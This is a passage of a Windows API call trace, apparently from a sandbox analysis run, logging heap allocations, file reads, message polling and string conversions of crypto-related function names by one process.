Flags=0x0, Size=0x10) returned 0x9bd978 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0198.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0198.090] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0198.090] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0198.094] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x80a6, lpOverlapped=0x0) returned 1 [0198.095] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0198.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0198.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0198.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x180a6) returned 0xbea018 [0198.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0198.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0198.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x180a6) returned 0xa5f008 [0198.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0198.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.099] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0198.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x180a6) returned 0xbea018 [0198.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0198.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0198.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.100] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0198.100] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.100] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0198.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x180a6) returned 0xbea018 [0198.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0198.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5a0 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0198.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x180a6) returned 0xa770b8 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0198.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.102] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0198.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0198.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0198.103] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0198.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0198.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.103] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0198.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0198.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0198.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.104] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0198.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.104] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.105] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0198.106] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0198.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0198.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0198.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.106] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0198.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.107] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0198.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0198.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) 